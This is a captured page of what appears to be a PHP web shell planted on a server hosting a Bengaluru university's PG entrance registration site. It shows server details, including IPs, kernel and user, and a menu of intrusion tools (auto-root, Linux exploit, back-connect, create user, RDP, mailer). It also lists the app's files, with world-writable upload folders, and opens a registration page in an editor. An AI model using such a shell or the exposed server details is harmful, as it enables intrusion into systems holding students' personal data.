Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.222.119.143
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
PrathibhaKaranji_stop /
[ HOME SHELL ]
Name
Size
Permission
Action
PHPExcel-1.8
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
dompdf
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
student_photos
[ DIR ]
drwxrwxrwx
tcpdf
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxrwxrwx
BU_connect.php
442
B
-rwxr-xr-x
MainPage.html
29.86
KB
-rwxr-xr-x
MainPage_dev.html
36.76
KB
-rwxr-xr-x
admission_sms_push.php
2.42
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
cconfig.php
1.49
KB
-rwxr-xr-x
cronjob_sendsms.php
2.52
KB
-rwxr-xr-x
database.php
445
B
-rwxr-xr-x
forgot-password.php
2.19
KB
-rwxr-xr-x
forgotPassword.html
3.84
KB
-rwxr-xr-x
index.html
5.68
KB
-rwxr-xr-x
index_1.html
3.92
KB
-rwxr-xr-x
instruction.html
4
KB
-rwxr-xr-x
instruction_10092018.html
8.37
KB
-rwxr-xr-x
instruction_24092018.html
9.08
KB
-rwxr-xr-x
instruction_regn.html
5.07
KB
-rwxr-xr-x
login.php
235
B
-rwxr-xr-x
pg-forgotPassword.html
4.1
KB
-rwxr-xr-x
pg-sign-up.html
7.15
KB
-rwxr-xr-x
pgResponse.php
7.77
KB
-rwxr-xr-x
pgStudStatus.html
4.32
KB
-rwxr-xr-x
pg_instruction.html
8.53
KB
-rwxr-xr-x
pgadm.html
111.5
KB
-rwxr-xr-x
resetpassword.php
697
B
-rwxr-xr-x
sendGridMail.php
1.28
KB
-rwxr-xr-x
sendMobEmailOTP.php
1.39
KB
-rwxr-xr-x
sendsmsapi.php
760
B
-rwxr-xr-x
sign-up.html
7.16
KB
-rwxr-xr-x
signin.php
796
B
-rwxr-xr-x
signup.php
974
B
-rwxr-xr-x
sumexeclreport.php
6.17
KB
-rwxr-xr-x
support.html
5.37
KB
-rwxr-xr-x
upload.php
415
B
-rwxr-xr-x
upload1.php
423
B
-rwxr-xr-x
upload_file.php
813
B
-rwxr-xr-x
upload_file_pg.php
740
B
-rwxr-xr-x
validateRegno.php
1.79
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pg_instruction.html
<!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport" /> <title>PG Online Registration</title> <!-- Favicon--> <link rel="icon" href="images/favicon.jpg" type="image/x-icon" /> <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,600,700,800&subset=latin-ext" rel="stylesheet" /> <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet" type="text/css" /> <!-- Bootstrap Core Css --> <link href="plugins/bootstrap/css/bootstrap.css" rel="stylesheet" /> <!-- Waves Effect Css --> <link href="plugins/node-waves/waves.css" rel="stylesheet" /> <!-- Custom Css --> <link href="css/style_adm.css" rel="stylesheet" /> <!-- AdminBSB Themes. You can choose a theme from css/themes instead of get all themes --> <link href="css/themes/all-themes.css" rel="stylesheet" /> <style> .font-16 { font-size: 16px !important; } </style> </head> <body class="theme-pink" onload="login()"> <!-- Page Loader --> <div class="page-loader-wrapper"> <div class="loader"> <div class="preloader"> <div class="spinner-layer pl-red"> <div class="circle-clipper left"> <div class="circle"></div> </div> <div class="circle-clipper right"> <div class="circle"></div> </div> </div> </div> <p>Please wait...</p> </div> </div> <!-- #END# Page Loader --> <!-- Top Bar --> <nav class="navbar"> <div class="container-fluid" style="color: #fff;"> <div class="col-md-12 m-t--5"> <center> <script type="text/javascript"> var url = window.location.pathname.split("/"); if (url[1] == "bnu") document.write( '<h2 class="brand" style="margin-left: 50px;">Bengaluru North University</h2>' ); else if (url[1] == "bcu") document.write( '<h2 class="brand" style="margin-left: 50px;">Bengaluru Central University ( BCU )</h2>' ); </script> </center> <center> <h3 style="margin-top: -4px;"> Online Registration for PG Entrance test 2019-20 </h3> </center> <a href="#" onclick="logout()" style="float: right;margin-top: -25px; font-size:16px;color: #fff;" >Logout</a > </div> </div> </nav> <section class="content" style="margin-top: 11%"> <div class="row clearfix"> <div class="container-fluid"> <div class="col-lg-10 col-md-10 col-sm-12 col-xs-12 "> <div class="card p-l-20 p-r-20 p-b-20"> <div class="p-t-10 p-l-10 p-r-10" style="font-size: 15px;"> <p> Warm welcome to <b>PG Entrence Test Online Registration</b>. </p> <b>Key Notes</b> <ul style="text-align: justify;"> <li> <span style="color:red" ><b >Those students who have not provided their 6th sem marks cards are advised to update their online application and submit the edited copy of application with 6th sem Marks Card before 31/07/2019.</b ></span > </li> <li> ಎಲ್ಲಾ ಅಂಕಣ ಭರ್ತಿ ಮಾಡಬೇಕು. ಅನ್ವಯಿಸದ ಅಂಕಣ N.A ಎಂದು ಬರೆಯಬೇಕು. ಅಪೂರ್ಣ ಅರ್ಜಿಯನ್ನು ತಿರಸ್ಕರಿಸಲಾಗುವುದು. <br />All the columns should be filled. Columns not applicable should be Written as N. A. Incomplete Application is liable to be rejected. </li> <li> ನಿಮ್ಮ ಎಲ್ಲಾ ಬೇಡಿಕೆಗಳಿಗೆ ಸಂಬಂಧಿಸಿದ ಪ್ರಮಾಣ ಪತ್ರಗಳ ನೆರಳಚ್ಚು ಪ್ರತಿಗಳುನ್ನು ಲಗತ್ತಿಸುವುದು. <br /> PHOTO – COPIES of relevant certificates should be submitted for all your claims. </li> <li> Before filling online application candidate must aware of all the information required to fill the online form along with scanned copy of recent photograph in <b>JPEG FORMAT</b> </li> <li> Candidates shall go through the Website and the notification for details. </li> <li> If any information furnished by the applicant is found not correct, his registration is liable to be cancelled. </li> <li> Upon Successful payment through payment gateway, application form will be generated. </li> <li> For Technical Support only contact : 080-46023000 <br /> For Non Technical assistance contact : 080-22961016 / 22131385 <br /> Email Address : bcuccb@gmail.com </li> </ul> </div> <hr /> <div class="row clearfix btns"> <div> <a href="pgadm.html" ><button class="btn btn-primary btn-lg waves-effect font-16" > Apply or Edit Application </button></a > </div> <div> <button class="btn btn-primary btn-lg waves-effect font-16" onclick="rePrintApplication()" > Re-print Application </button> </div> <!-- <div> <a href="pgStudStatus.html"> <button class="btn btn-primary btn-lg waves-effect font-16" onclick="studPGetStatus()" > Check Status </button></a > </div> --> <div> <button onclick="hallticket()" class="btn btn-primary btn-lg waves-effect font-16" > Download Hall Ticket </button> </div> </div> </div> </div> </div> </div> </section> <script src="plugins/jquery/jquery.min.js"></script> <!-- Bootstrap Core Js --> <script src="plugins/bootstrap/js/bootstrap.js"></script> <!-- Select Plugin Js --> <script src="plugins/bootstrap-select/js/bootstrap-select.js"></script> <!-- Slimscroll Plugin Js --> <script src="plugins/jquery-slimscroll/jquery.slimscroll.js"></script> <!-- Waves Effect Plugin Js --> <script src="plugins/node-waves/waves.js"></script> <!-- Custom Js --> <script src="js/admin.js"></script> <!-- Demo Js --> <script src="js/demo.js"></script> <script src="js/pg/login.js"></script> <script src="js/pg/reprint.js"></script> <script src="js/pg/studStatus.js"></script> <script type="text/javascript"> function hallticket() { var $host_url = "http://" + window.location.host + "/" + window.location.pathname.split("/")[1] + "/" + window.location.pathname.split("/")[2] + "/app.php?a="; window.location.href = $host_url + "generatehallticket"; } </script> </body> </html>
Close